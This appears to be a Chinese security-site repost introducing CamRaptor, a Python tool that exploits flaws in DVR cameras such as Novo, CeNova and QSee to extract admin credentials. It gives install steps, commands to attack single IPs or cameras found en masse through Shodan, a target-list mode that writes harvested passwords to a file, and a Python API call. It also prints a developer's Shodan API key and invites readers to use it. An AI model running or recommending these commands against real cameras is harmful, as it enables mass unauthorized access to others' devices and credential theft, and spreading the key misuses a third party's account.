CamRaptor:针对DVR摄像头的漏洞利用工具

admin 2021年9月4日07:23:48评论120 views字数 1179阅读3分55秒阅读模式

关于CamRaptor

CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。

功能介绍

能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。

经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。

简单的命令行接口和API使用方法。

工具安装

由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamRaptor:

pip3 install git+https://github.com/EntySec/CamRaptor

工具基础使用

CamRaptor的使用非常简单,我们只需要在命令行终端中输入“camraptor”命令即可使用CamRaptor:

工具使用样例

攻击单个摄像头

下列命令可以攻击单个DVR摄像头:

camraptor -a 192.168.99.100

通过网络攻击远程DVR摄像头

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

从输入文件获取目标摄像头

我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

camraptor -t -i cameras.txt -o passwords.txt

注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

CamRaptor还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

from camraptor import CamRaptor

基础函数

exploit(address):根据给定的地址针对单个目标执行漏洞利用攻击;

调用样例

攻击单个摄像头:

from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)

项目地址

CamRaptor:https://github.com/EntySec/CamRaptor


本文始发于微信公众号(盾山实验室):CamRaptor:针对DVR摄像头的漏洞利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日07:23:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CamRaptor:针对DVR摄像头的漏洞利用工具https://cn-sec.com/archives/461996.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息